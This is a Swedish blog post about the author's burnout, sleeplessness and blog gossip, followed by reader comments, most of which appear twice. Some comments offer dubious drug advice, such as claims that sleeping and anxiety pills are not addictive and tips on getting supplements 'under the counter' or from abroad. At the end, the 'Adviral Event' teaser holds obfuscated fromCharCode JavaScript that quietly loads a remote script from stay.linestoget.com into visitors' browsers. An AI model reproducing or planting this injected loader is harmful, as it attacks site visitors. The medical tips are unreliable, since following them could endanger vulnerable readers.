Mys Blommor / Din florist / Interflora 🌹 / Högsta Kvalitet & Design💫 🌍 Catalina Torget 15 Täby 📲 08 36 36 14

Mys Blommor🌹/ Din florist / Högsta Kvalitet & Design💫 / 🌍 Catalina Torget 15 Täby 📲 08 36 36 14

@mymartens

@mys_blommor

Strong Mamas

När vet man om man ”gått in i väggen”???!

image

Hej fina!

Idag har det inte gått i många Knop. Det var ett bra beslut att låta Ludvig vara ledig och bara vara hemma… Förmiddagen gjorde vi Ingenting. Åt frukost, tittade på tv. myss på filt i trädgården på gräsmattan…blir lego bugge på det….image Sen fick jag lite energi och tog ett ”ryck” och kastade in en sisådär 20 kartonger som jag hade med mig i skåpbilen upp från öland. Det är nämligen så att jag VARJE gång jag flytta sedan separationen har lämnat några kartonger på mitt kontor på Öland. (SUCK) Nu var det daga att rensa. Inte en dag för tidigt om jag ska vara ärlig! Kontoret har sett ut som ett kaos!! 

Kartongerna innehåller bilder på mig som barn. Gamla ”bra att ha grejer” med andra ord en massa onödigt skit . Och en massa andra grejer som jag inte vill ha framme. Men Heller inte heller vill göra mig av med.

efter en timmes bärande från bilen in i källaren så ringde en väninna och bjöd bort oss på lunch.

-Perfekt timing! Titta så gott! Det är vardagslyx det, att bli spontanbjuden på hemmagjord lunch 🙂 och inte vilken lunch som hela! Amerikanska pannkakor! OLYMPUS DIGITAL CAMERA OLYMPUS DIGITAL CAMERAEfter lunch och mys åkte vi till affären. Handlade lite. GALET mycket folk som är ute och handlar nu inför midsommar. Att jag ALDRIG lär mig! Jag som är ganska folkskygg just nu blev lätt stressad och skyndade mig snabbt därifrån. Hemma igen så byggde vi lego, jag tvättade lite…. Jobbade en stund med rese-reportaget från New York. Sen somnade jag…. I solen på en filt. Jag vaknade med ett ryck av att Ludvig la sig brevid mig. Vi somnade om en timme till! SÅ skönt! Jag sov nog drygt TVÅ timmar mitt på dagen! Men jag är fortfarande trött! Känns lite som om jag varandrar runt i en dimma…Då har jag INTE tagit några starka piller! Inte några piller als!image Jag orkade aldrig åka till vårdcentralen idag. Jag VET att jag borde gjort det! Men jag orkade inte. Jag försökte övertala mig själv…. Men  Pallade inte med att sitta i kö med Lilleman i flera timmar. Trots att jag bor 75 M ifrån vårdcentralen. Men det var fullt av folk och som sagt, energin fanns inte. Just precis just nu ångrar jag det. Jag är rastlös inombords, orolig och kan inte somna! Jag räknar får. Det hjälper inte. 

Jag har googlat lite. Vad finns det för Sömnhormoner man kan tillsätta? Alltså inte receptbelagda…

Någon här inne som har erfarenhet av det?

jag är så j*vla rädd för ångestdämpande medicin och sömntabletter! Blir någon beroende så är det jag! Och det är det sista jag vill bli! O andra sidan så MÅSTE jag få sova snart! Detta börjar sätta för tydliga spår.

Glömska, ingen aptit, ingen ork, mer ångest, trötthet, stress, väldigt oeffektiv, osv! Dålig kombo oavsett!

Jag är rädd att tappa kontrollen, rädd att falla ihop fullkomligt. Rädd att ”gå in i väggen” rädd att förlora min styrka jag alltid haft! RÄDD att tappa fotfästet!

– När vet man när man gått in i väggen? image

Jag måste hålla mig på hemmaplan nu. Stockholm/Öland. Jag kan inte ta semester för mig och Lilleman som vi planerat. Vi skulle åkt till Spanien. Nu blir det inte så. Imorgon åker vi iväg, med goda vänner. Men på lördag. Måste jag vara tilllbaka i Sthlm. Och på söndag på Öland. Sem är det dags för mig att ta mitt sista beslut. Att åka ner och ta tag i allt som behöver göras. På sätt och vis så vet jag vart det lutar. Men jag är inte säker. Har inte riktigt förlikat mig med Det. Däremot ska det bli VÄlDIGT skönt att slippa vara kryptisk och helt enkelt bara säga vad detta handlar om. Det är inte av elakhet som jag inte gjort det. Jag varken får, kan eller vet hur det blir ännu… Men efte midsommar är tiden kommen….. Hjälp vad obehagligt! Och vad ont det gör!!!

 På tal om elakheter, den här ”listan” på alla upptagna män jag varit på/legat med?! Var det NÅGON som verkligen  sett denna Lista?  Och isåfall på vilken blogg? Denna otroligt ytliga och många gånger barnslig bloggvärld har ännu en gång bjudit på ett gott skratt! Det enda jag kan förundras Men samtidigt le åt är just det faktum att personen/personerna väljer att lägga så mycket energi på mig, på vad jag gör och inte gör. Är inte det lite konstigt? Jag tycker det säger mer om ”personerna”  ifråga än om mig! 

Jag har EN gång gjort ett offentligt uttalande om en bloggkollega. EN gång. Jag skrev, jag publicerade och jag stod för det! Så funkar jag!!!

men dessa bloggmakerskor skriver inte öppet, står inte för någonting och skulle aldrig väga stå upp för sin åsikt! -Varför?!

Istället smusslas det bakom ryggen, tisslas, tasslas, insinueras, backstabbas, baktalar osv…. -Kom igen nu, vi är vuxna kvinnor, med barn! Vi är MAMMOR! Vi ska vara starka förebilder!  Ingenting annat!

Så som vi beter oss kommer även våra små kids att bete sig! Det tål att tänka på!

Nog om det! Jag har inte sett den där listan alla snackar om? Det råkar inte vara så att någon tog en screen dump, eller såg vad som verkligen stod???? Egentligen borde jag inte lägga NÅGON energi, men just denna listan skulle jg behöva se!

Tacksam OM  du har en bild OM du kan maila mig den på mymartens@gmail.com 🙂

nu ska jag föröka mig på att somna (igen) önskar sig en skön kväll och en bra midsommar! Kramar

/My Martens

 

56 Komentarer

 1. Du som är egenföretagare borde nog teckna en sjukvårdsförsäkring, ett tips. Är det samtal som gäller kan du alltid söka privat psykolog, då slipper du vänta i kö.

 2. Hej!
  Låter som du gått in i väggen och har fått panikångest. Det första du måste göra är att sluta stressa och vila och gör det nödvändigaste tex ta hand om din son, annars går det inte över. Om du inte tar hand om dig kan det leda till depression och då måste du oftast ta hjälp från sjukvården .. Låt det inte gå för långt.. Ta hand om dig, det finns bara en av dig och Ludde behöver en mamma som mår bra. Ta en paus från allt ett tag!

 3. Hej My!
  Dra i handbromsen och det NU. Jag ser alla varningssignaler, av det du skriver, som jag inte såg på mig själv innan den berömda väggen dök upp. Gick till jobbet men kom inte ihåg hur jag gjorde vissa rutiner och huvudet blev tungt.
  Detta var i början på mars, men då hade jag sovit dåligt sedan september…
  Veckan du har lilleman, försök att inte göra någonting, bara vila och få i dig mat. Men framförallt, ta promenader. Lär dig avslappning, testa mindful yoga. Boka tid på vc och prata med en psykolog. Kräv att få gå någon sorts stressgrupp, KBT, det har hjälpt mig otroligt mycket.
  Det som hjälpte mig att sova bättre var inga tabletter, för det ville jag inte, utan FitLine. Redan efter en veckas användning sov jag bättre.
  Hojta bara till om du vill ha mer tips och råd, men inte här, så hjälper jag dig gärna. Finns mycket bra litteratur också att läsa så att man lär sig hantera sin hjärna på ett bra och hälsosamt sätt. Sedan finns många bra sidor på nätet som min psykolog gav mig tips om.
  Önska dig all lycka till och snälla dra i nödbromsen i tid, annars kan det ta längre tid att ta sig tillbaka.
  Kram

 4. Fy stackars dig … vet själv av stress oro jag har annat jag mår och mått dåligt av ..jag tar imovane när jag inte kan sova , är också emot att ta piller men jobbar inom sjukvården hellre sova en att bli ett vrak på grund av sömnbrist . Min son har adhd han får melatonin han är 15 år han har en utmattningsdepressions på grund av sin skolsitiuation .. melatonin är ett hormon som får han att sova bättre .. fråga om du kan få det till natten ej beroende framkallande iaf ..ta hand om dig kram

 5. Usch! Stackars dig! Olidligt att må så!
  Läs på lite om Gaba (mot ångest) 5-htp (bildar serotonin (må-bra-hormon)på morgonen o melatonin (sömn-hormon) om mam tar det när det är mörkt) och möjligtvis L-tyrosine som hjälper dopamin o noradrenalin. Tyvärr finns inte Gaba o 5-htp i Sverige, kan finnas på vissa hälsokost-butiker ”under disk”
  Var rädd om dig!

 6. Du har inte gått in i väggen men är på väg dit med en rasande fart..inte långt kvar om du inte drar i handbromsen nu!!!
  Vila vila vila, meditera, ut i skogen..
  jag blev sjukskriven för utmattningssyndrom för 3.5 år sen och jag är på väg tillbaka med myrsteg..
  När det tar stopp så tar det verkligen stopp. Hjärnan slutar fungera, kroppen slutar fungera. Då kan du glömma allt vad jobb och socialt liv heter, då får du vara glad om du kommer ur sängen på dagarna..jag orkade inte hålla upp mitt eget huvud det första halvåret mer än ett i par minuter utan var tvungen att alltid ligga så huvudet hade stöd.
  Din kropp varnar dig för fullt nu och snälla lyssna på dom signalerna innan det är för sent!!!

 7. Det ska finnas sömntabletter på hälsokosten , fråga där eller goggla. Funderar på att pröva det som ett alternativ till vanliga sömntabletter. Symptom när jag var utbränd : sömnen, panik ångest , klara inte att vara bland mycket folk , ljuskänslig , spännings huvudvärk, glömde saker: koder till bankomat kort, data mm. Det jag gjorde för att komma tillbaks : spikmatta, andnings yoga, kbt , sömntabletter, gjorde saker som jag mådde bra av: roliga filmer , fikade med nära vänner, lyssnade inåt , undvek fester , Foksamlingar. Det tog 3 år att komma tillbaks någorlunda . Idag säger kroppen ifrån med spännings huvudvärk när det är för mycket , har fortf sömnproblem när det blir för mycket . Stor kram !

 8. Jag slutade sova, sov inte på 3 månader fick sjukskriva mig orkade inte jobba.hade jag tur slumrade jag till mellan 1-3 timmar men inte i sträck hade oftast o timmar sömn, trodde jag skulle dö av sömnbrist men kroppen klarar mer än man tror..Hade ångest ville helst inte vara själv, tappade ord m. MB Jag tog inga tabletter det jag gjorde var att ta reda på orsaken trodde jag gått in i den berömda väggen, jag började gå flera timmar om dagen rensa hjärnan.. Läste /letade på nätet mitt ”tillstånd” började efter eller under en influensa innan det har jag varit måttligt stressad med bråkande hormoner men var liksom som att influensan fick allt att strejka att inte kunna sova är hemskt jag hade helt glömt bort hur var konstant pigg i huvudet.. Eftersom jag hade rosacea visste jag att mina hormoner va skit så googlade och hittade en kräm med progesteron (Female balance ) och 2 dagar tog det innan jag sov 5 timmar i sträck lycka all ångest försvann jag blev lugn crazy härligt.. Min stress på jobbet och runt omkring hade helt Messat med måbra och sov hormonerna men hade inte trott att jag skulle bli bra så fort och bäst av allt rosacean försvann..har en arbetskompis nu som inte kan sova hon får atarax som egentligen är en allergimedicin den gör så att hon somnar och om hon vaknar somnar hon om lättare utan att ligga vaken resten av natten och dem är inte beroendeframkallande.. Hoppas allt blir bra för dig ❤️

 9. Du som är egenföretagare borde nog teckna en sjukvårdsförsäkring, ett tips. Är det samtal som gäller kan du alltid söka privat psykolog, då slipper du vänta i kö.

 10. Hej!
  Låter som du gått in i väggen och har fått panikångest. Det första du måste göra är att sluta stressa och vila och gör det nödvändigaste tex ta hand om din son, annars går det inte över. Om du inte tar hand om dig kan det leda till depression och då måste du oftast ta hjälp från sjukvården .. Låt det inte gå för långt.. Ta hand om dig, det finns bara en av dig och Ludde behöver en mamma som mår bra. Ta en paus från allt ett tag!

 11. Hej My!
  Dra i handbromsen och det NU. Jag ser alla varningssignaler, av det du skriver, som jag inte såg på mig själv innan den berömda väggen dök upp. Gick till jobbet men kom inte ihåg hur jag gjorde vissa rutiner och huvudet blev tungt.
  Detta var i början på mars, men då hade jag sovit dåligt sedan september…
  Veckan du har lilleman, försök att inte göra någonting, bara vila och få i dig mat. Men framförallt, ta promenader. Lär dig avslappning, testa mindful yoga. Boka tid på vc och prata med en psykolog. Kräv att få gå någon sorts stressgrupp, KBT, det har hjälpt mig otroligt mycket.
  Det som hjälpte mig att sova bättre var inga tabletter, för det ville jag inte, utan FitLine. Redan efter en veckas användning sov jag bättre.
  Hojta bara till om du vill ha mer tips och råd, men inte här, så hjälper jag dig gärna. Finns mycket bra litteratur också att läsa så att man lär sig hantera sin hjärna på ett bra och hälsosamt sätt. Sedan finns många bra sidor på nätet som min psykolog gav mig tips om.
  Önska dig all lycka till och snälla dra i nödbromsen i tid, annars kan det ta längre tid att ta sig tillbaka.
  Kram

 12. Fy stackars dig … vet själv av stress oro jag har annat jag mår och mått dåligt av ..jag tar imovane när jag inte kan sova , är också emot att ta piller men jobbar inom sjukvården hellre sova en att bli ett vrak på grund av sömnbrist . Min son har adhd han får melatonin han är 15 år han har en utmattningsdepressions på grund av sin skolsitiuation .. melatonin är ett hormon som får han att sova bättre .. fråga om du kan få det till natten ej beroende framkallande iaf ..ta hand om dig kram

 13. Usch! Stackars dig! Olidligt att må så!
  Läs på lite om Gaba (mot ångest) 5-htp (bildar serotonin (må-bra-hormon)på morgonen o melatonin (sömn-hormon) om mam tar det när det är mörkt) och möjligtvis L-tyrosine som hjälper dopamin o noradrenalin. Tyvärr finns inte Gaba o 5-htp i Sverige, kan finnas på vissa hälsokost-butiker ”under disk”
  Var rädd om dig!

 14. Du har inte gått in i väggen men är på väg dit med en rasande fart..inte långt kvar om du inte drar i handbromsen nu!!!
  Vila vila vila, meditera, ut i skogen..
  jag blev sjukskriven för utmattningssyndrom för 3.5 år sen och jag är på väg tillbaka med myrsteg..
  När det tar stopp så tar det verkligen stopp. Hjärnan slutar fungera, kroppen slutar fungera. Då kan du glömma allt vad jobb och socialt liv heter, då får du vara glad om du kommer ur sängen på dagarna..jag orkade inte hålla upp mitt eget huvud det första halvåret mer än ett i par minuter utan var tvungen att alltid ligga så huvudet hade stöd.
  Din kropp varnar dig för fullt nu och snälla lyssna på dom signalerna innan det är för sent!!!

 15. Det ska finnas sömntabletter på hälsokosten , fråga där eller goggla. Funderar på att pröva det som ett alternativ till vanliga sömntabletter. Symptom när jag var utbränd : sömnen, panik ångest , klara inte att vara bland mycket folk , ljuskänslig , spännings huvudvärk, glömde saker: koder till bankomat kort, data mm. Det jag gjorde för att komma tillbaks : spikmatta, andnings yoga, kbt , sömntabletter, gjorde saker som jag mådde bra av: roliga filmer , fikade med nära vänner, lyssnade inåt , undvek fester , Foksamlingar. Det tog 3 år att komma tillbaks någorlunda . Idag säger kroppen ifrån med spännings huvudvärk när det är för mycket , har fortf sömnproblem när det blir för mycket . Stor kram !

 16. Jag slutade sova, sov inte på 3 månader fick sjukskriva mig orkade inte jobba.hade jag tur slumrade jag till mellan 1-3 timmar men inte i sträck hade oftast o timmar sömn, trodde jag skulle dö av sömnbrist men kroppen klarar mer än man tror..Hade ångest ville helst inte vara själv, tappade ord m. MB Jag tog inga tabletter det jag gjorde var att ta reda på orsaken trodde jag gått in i den berömda väggen, jag började gå flera timmar om dagen rensa hjärnan.. Läste /letade på nätet mitt ”tillstånd” började efter eller under en influensa innan det har jag varit måttligt stressad med bråkande hormoner men var liksom som att influensan fick allt att strejka att inte kunna sova är hemskt jag hade helt glömt bort hur var konstant pigg i huvudet.. Eftersom jag hade rosacea visste jag att mina hormoner va skit så googlade och hittade en kräm med progesteron (Female balance ) och 2 dagar tog det innan jag sov 5 timmar i sträck lycka all ångest försvann jag blev lugn crazy härligt.. Min stress på jobbet och runt omkring hade helt Messat med måbra och sov hormonerna men hade inte trott att jag skulle bli bra så fort och bäst av allt rosacean försvann..har en arbetskompis nu som inte kan sova hon får atarax som egentligen är en allergimedicin den gör så att hon somnar och om hon vaknar somnar hon om lättare utan att ligga vaken resten av natten och dem är inte beroendeframkallande.. Hoppas allt blir bra för dig ❤️

 17. Gå till en läkare som kan berätta hur tabletterna fungerar. De är inte beroendeframkallande. Du kan må dåligt ett par veckor när du börjar och slutar. Räkna med att äta ett år. Förutsatt att du behöver äta. Kanske du ska avvakta ditt beslut. Finns det hopp om att du mår bättre när beslut är fattat?
  Hur man vet är nog olika. Någon biter ihop så länge att det slutar med att de inte ens kommer ur sängen och någon sätter stopp tidigare och det går inte så långt .

 18. Gå till en läkare som kan berätta hur tabletterna fungerar. De är inte beroendeframkallande. Du kan må dåligt ett par veckor när du börjar och slutar. Räkna med att äta ett år. Förutsatt att du behöver äta. Kanske du ska avvakta ditt beslut. Finns det hopp om att du mår bättre när beslut är fattat?

  Hur man vet är nog olika. Någon biter ihop så länge att det slutar med att de inte ens kommer ur sängen och någon sätter stopp tidigare och det går inte så långt .

 19. Säger som många andra .Dra i handbromsen och det Nu ..vänta inte en sekund till .Har själv varit där och körde på som du och pang bom så vaknade jag en morgon och kom ej ur sängen .Fick hjälp av en kompis att ta mig till vårdcentral och sen hade jag ett helvete under 6 mån .Ville köra på men det gick inte .Även i dag efter många år reagerar kroppen om jag har för mycket omkring mig .Så för att slippa detta helvete lyssna på oss , släpp allt och dra dig undan tills du mår bättre …det tjänar du allt på .Kram på dig

 20. Gå till läkare. Du kommer inte att finns ett enda naturläkemedel som hjälper. Jag har snart 40 års erfarenhet
  Få tala med läkare ! Är nog det viktigaste innan det går för långt

 21. Hej My!
  Varva ner! Bättre ta ett beslut nu och trappa ner och vila än att allt rasar. Receptbelagd medicin gällande psyket följer dig många år. Ska du ta en försäkring, nytt jobb, hälsoundersökning. Då skall man alltid ange att man medicnerat och så kan dom vilja se journaler. Tänk istället om NU Vila, ät hälsosamt, motionera i lagom takt. Undvik alkohol, alkohol förstärker sinnesstämningen man redan är i. Jag tränade lite för mycket och blev stressad av att inte träna vilket sänkte mig. Prata med vänner och få ur dig det jobbiga. Skriv av dig inte på bloggen utan i ett skrivblock. Ingen är oumbärlig. Ta hand om dig, din son och utnyttja dina vänner, känn ingen skuld att du lägger dig i händerna på dina vänner. Riktiga vänner finns i med och motgång. Styrkekramar till dig

 22. Jag lider med dej, hoppas du unnar dig aDu tycks gå igenom ngt svårt kroppens minne o sår är känsliga system.Önskar man kunde ge styrkepiller men de tar nog tid, har du skrivit lite om din uppväxt om jag läst rätt, då är du utsatt för all ångest lilla My känt . Kanske lite samtal kan hjälpa… Någon vännina kan passa lille sonen och mysa lite ?kramar på er fr ett mormors hjärta.

 23. Melatonin är kroppens egen sömn hormon och är receptbelagt i Sverige men i andra delar av Europa är det receptfritt och vanligare. Min mormor fick detta utskrivet och sov typ för första gången på 20 år en hel natt. Hon använder inte dem varje natt utan kan numera sova hela nätter utan någon ”hjälp” utan mer när hon känner att hon måste/behöver sova ❤

 24. Jag hoppas verkligen att du snart får må bättre, men hör på det du skriver att du måste bromsa på riktigt nu. Fokusera på bara dig och lilleman ett tag. Umgås bara med vänner som ger energi. Och ge yoga och avslappning en ärlig chans, har hjälp mig massor <3
  Gör sådant som ger dig positiv energi och en glad känsla. Kram och ta hand om dig.

 25. Säger som många andra .Dra i handbromsen och det Nu ..vänta inte en sekund till .Har själv varit där och körde på som du och pang bom så vaknade jag en morgon och kom ej ur sängen .Fick hjälp av en kompis att ta mig till vårdcentral och sen hade jag ett helvete under 6 mån .Ville köra på men det gick inte .Även i dag efter många år reagerar kroppen om jag har för mycket omkring mig .Så för att slippa detta helvete lyssna på oss , släpp allt och dra dig undan tills du mår bättre …det tjänar du allt på .Kram på dig

 26. Gå till läkare. Du kommer inte att finns ett enda naturläkemedel som hjälper. Jag har snart 40 års erfarenhet
  Få tala med läkare ! Är nog det viktigaste innan det går för långt

 27. Jag sover bra på Melatonin. Det finns i Sverige på recept och heter då Cicadin. Annars kan du säkert be din kompis köpa med sig från Spanien, där det finns billigt och i lite högre styrkor. Var rädd om dig ~ det finns bara en DU!
  Kram!

 28. Hej My!
  Varva ner! Bättre ta ett beslut nu och trappa ner och vila än att allt rasar. Receptbelagd medicin gällande psyket följer dig många år. Ska du ta en försäkring, nytt jobb, hälsoundersökning. Då skall man alltid ange att man medicnerat och så kan dom vilja se journaler. Tänk istället om NU Vila, ät hälsosamt, motionera i lagom takt. Undvik alkohol, alkohol förstärker sinnesstämningen man redan är i. Jag tränade lite för mycket och blev stressad av att inte träna vilket sänkte mig. Prata med vänner och få ur dig det jobbiga. Skriv av dig inte på bloggen utan i ett skrivblock. Ingen är oumbärlig. Ta hand om dig, din son och utnyttja dina vänner, känn ingen skuld att du lägger dig i händerna på dina vänner. Riktiga vänner finns i med och motgång. Styrkekramar till dig

 29. Hej
  Nu berättar du om folkskygghet och att sova på dagen men ändå fortfarande vara lika trött. Det är typiska tecken på att gått in i väggen. Ju längre du pressar din kropp desto längre tid tar det för dig att bli bra igen. Risken finns väl att när du tagit det viktiga stora beslutet och besökt läkare så släpper du alla spänningar och rasar ihop fullständigt. Det är inte för att vara elak som jag skriver det men risken finns. Jag gjorde precis som du innan jag kraschade och bara ångade på och struntade i återhämtningen. Man tror att vara social kräver inte så mycket energi men det suger massor. Tänk på det idag när du sitter vid matbordet med alla när alla pratar. Hur fixar du det? När jag varit som sämst så stänger min hjärna av sig vid såna tillfällen och det slutar med att jag sitter och glor rakt fram för hjärnan klarar inte av att sortera alla ljuden och koncentrera sig på ett samtal. Hoppas du får en trevlig midsommar.

 30. Jag lider med dej, hoppas du unnar dig aDu tycks gå igenom ngt svårt kroppens minne o sår är känsliga system.Önskar man kunde ge styrkepiller men de tar nog tid, har du skrivit lite om din uppväxt om jag läst rätt, då är du utsatt för all ångest lilla My känt . Kanske lite samtal kan hjälpa… Någon vännina kan passa lille sonen och mysa lite ?kramar på er fr ett mormors hjärta.

 31. Melatonin är kroppens egen sömn hormon och är receptbelagt i Sverige men i andra delar av Europa är det receptfritt och vanligare. Min mormor fick detta utskrivet och sov typ för första gången på 20 år en hel natt. Hon använder inte dem varje natt utan kan numera sova hela nätter utan någon ”hjälp” utan mer när hon känner att hon måste/behöver sova ❤

 32. Oj som jag känner igen mig i allt du skriver. Det första jag kan undra är om du kollat upp din sköldkörtel nån gång? Alla symtomen du beskriver är såå klassiska för hypotyreos. Läa gärna om det på nätet finns även en variant som heter Hashimotos som egentligen har alla dem symtomen som du uppvisar. När jag var gravid och inte fick jag ångestdämpande tog jag Lergigan som egentligen är en antihistamin vilket gör att man inte blir beroende. Min pappa har ett företag som specialiserar sig på att ta sig tillbaka på naturliga medel du får mer än gärna höra av dig till mig mig på marika.lundblad@gmail.com om du undrar mer. Ta hand om dig och lilleman!

 33. Jag hoppas verkligen att du snart får må bättre, men hör på det du skriver att du måste bromsa på riktigt nu. Fokusera på bara dig och lilleman ett tag. Umgås bara med vänner som ger energi. Och ge yoga och avslappning en ärlig chans, har hjälp mig massor <3
  Gör sådant som ger dig positiv energi och en glad känsla. Kram och ta hand om dig.

 34. Jag sover bra på Melatonin. Det finns i Sverige på recept och heter då Cicadin. Annars kan du säkert be din kompis köpa med sig från Spanien, där det finns billigt och i lite högre styrkor. Var rädd om dig ~ det finns bara en DU!
  Kram!

 35. Hej
  Nu berättar du om folkskygghet och att sova på dagen men ändå fortfarande vara lika trött. Det är typiska tecken på att gått in i väggen. Ju längre du pressar din kropp desto längre tid tar det för dig att bli bra igen. Risken finns väl att när du tagit det viktiga stora beslutet och besökt läkare så släpper du alla spänningar och rasar ihop fullständigt. Det är inte för att vara elak som jag skriver det men risken finns. Jag gjorde precis som du innan jag kraschade och bara ångade på och struntade i återhämtningen. Man tror att vara social kräver inte så mycket energi men det suger massor. Tänk på det idag när du sitter vid matbordet med alla när alla pratar. Hur fixar du det? När jag varit som sämst så stänger min hjärna av sig vid såna tillfällen och det slutar med att jag sitter och glor rakt fram för hjärnan klarar inte av att sortera alla ljuden och koncentrera sig på ett samtal. Hoppas du får en trevlig midsommar.

 36. Oj som jag känner igen mig i allt du skriver. Det första jag kan undra är om du kollat upp din sköldkörtel nån gång? Alla symtomen du beskriver är såå klassiska för hypotyreos. Läa gärna om det på nätet finns även en variant som heter Hashimotos som egentligen har alla dem symtomen som du uppvisar. När jag var gravid och inte fick jag ångestdämpande tog jag Lergigan som egentligen är en antihistamin vilket gör att man inte blir beroende. Min pappa har ett företag som specialiserar sig på att ta sig tillbaka på naturliga medel du får mer än gärna höra av dig till mig mig på marika.lundblad@gmail.com om du undrar mer. Ta hand om dig och lilleman!

 37. Tabletter kan ju hjälpa, men om du absolut inte vill ta det så kan ju en hederlig meditation göra nytta. Gör en klassisk som gör att du fokuserar på din andning. Tänk att du andas som i en fyrkant. Andas in (räkna till tre) håll andan (räkna till tre) andas ut (räkna till tre) håll andan (räkna till tre) det är i tomrummen (när du håller andan) som avslappning kommer. Jag kör räkna till tre på mina barnyogaklasser men du kan öka upp till sju när du känner dig redo. Att fokusera på andningen gör att slaggprodukter kommer ut, lite självrensande och sen gör det att om du fokuserar på andningen så gör det att tankarna skingras en stund. Håll på mellan 3-11 minuter. 11 minuter är målet. Kram

 38. Tabletter kan ju hjälpa, men om du absolut inte vill ta det så kan ju en hederlig meditation göra nytta. Gör en klassisk som gör att du fokuserar på din andning. Tänk att du andas som i en fyrkant. Andas in (räkna till tre) håll andan (räkna till tre) andas ut (räkna till tre) håll andan (räkna till tre) det är i tomrummen (när du håller andan) som avslappning kommer. Jag kör räkna till tre på mina barnyogaklasser men du kan öka upp till sju när du känner dig redo. Att fokusera på andningen gör att slaggprodukter kommer ut, lite självrensande och sen gör det att om du fokuserar på andningen så gör det att tankarna skingras en stund. Håll på mellan 3-11 minuter. 11 minuter är målet. Kram

 39. Googla på Magnesiumspray och magnesium i pulverform samt Dr Bachs ”räddningsdroppar”, de är helt fantastiska! Ta väl hand om Er! Styrkekramar!!!

 40. Googla på Magnesiumspray och magnesium i pulverform samt Dr Bachs ”räddningsdroppar”, de är helt fantastiska! Ta väl hand om Er! Styrkekramar!!!

 41. Min omgivning hade länge försökt att varna mig för att jag var på väg in i väggen men jag lyssnade inte utan jag vet ju själv hur mycket jag orkar (trodde jag) och nu har det gått drygt 2,5 år och jag är långt ifrån bra fortfarande. För mig började det med att jag fick symptom som jag nonchalerade som var extraslag som satt i dygnet runt i drygt en vecka, läste på nätet att alla har extraslag men alla känner dom inte så jag körde på som vanligt i några veckor till fast det var jättejobbigt, hade också många vanliga symptom på utbrändhet som ljusskygghet, folkskygghet (orkade varken se eller höra folk) sömnstörningar, huvudvärk, panikångest, kom varken ihåg koder till bankomat dator etc eller hur man gör basala saker som att koka kaffe, ägg etc. När jag 2-3 veckor efter att extraslagen började står utanför vår gård (vi bor vid en vändplan) på väg till jobbet med massor av extraslag men inte vet åt vilket håll jag ska gå för att komma till bussen (åkt dessa bussar från samma hållplats i över 10 år) då tvingade min dotter mig att gå till läkare som jag inte litade på då hon sa att jag har utmattningsdepression så jag gick till nästa läkare som blev irriterad på den första läkaren som hade gått med på att sjukskriva mig på 75% i stället för heltid (på min begäran). Har nu 2,5 år senare kommit upp i halvtid men det är kämpigt. Så mitt tips till dig My är att sakta ner tempot nu innan Du bränner rakt in i väggen, jag tror att Du snart kraschar om Du inte börjar plocka bort saker som Du gör nu i stället för att tvingas plocka bort i stort sett allt när/om Du har kraschat in i väggen.
  Styrkekram

 42. Min omgivning hade länge försökt att varna mig för att jag var på väg in i väggen men jag lyssnade inte utan jag vet ju själv hur mycket jag orkar (trodde jag) och nu har det gått drygt 2,5 år och jag är långt ifrån bra fortfarande. För mig började det med att jag fick symptom som jag nonchalerade som var extraslag som satt i dygnet runt i drygt en vecka, läste på nätet att alla har extraslag men alla känner dom inte så jag körde på som vanligt i några veckor till fast det var jättejobbigt, hade också många vanliga symptom på utbrändhet som ljusskygghet, folkskygghet (orkade varken se eller höra folk) sömnstörningar, huvudvärk, panikångest, kom varken ihåg koder till bankomat dator etc eller hur man gör basala saker som att koka kaffe, ägg etc. När jag 2-3 veckor efter att extraslagen började står utanför vår gård (vi bor vid en vändplan) på väg till jobbet med massor av extraslag men inte vet åt vilket håll jag ska gå för att komma till bussen (åkt dessa bussar från samma hållplats i över 10 år) då tvingade min dotter mig att gå till läkare som jag inte litade på då hon sa att jag har utmattningsdepression så jag gick till nästa läkare som blev irriterad på den första läkaren som hade gått med på att sjukskriva mig på 75% i stället för heltid (på min begäran). Har nu 2,5 år senare kommit upp i halvtid men det är kämpigt. Så mitt tips till dig My är att sakta ner tempot nu innan Du bränner rakt in i väggen, jag tror att Du snart kraschar om Du inte börjar plocka bort saker som Du gör nu i stället för att tvingas plocka bort i stort sett allt när/om Du har kraschat in i väggen.
  Styrkekram

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/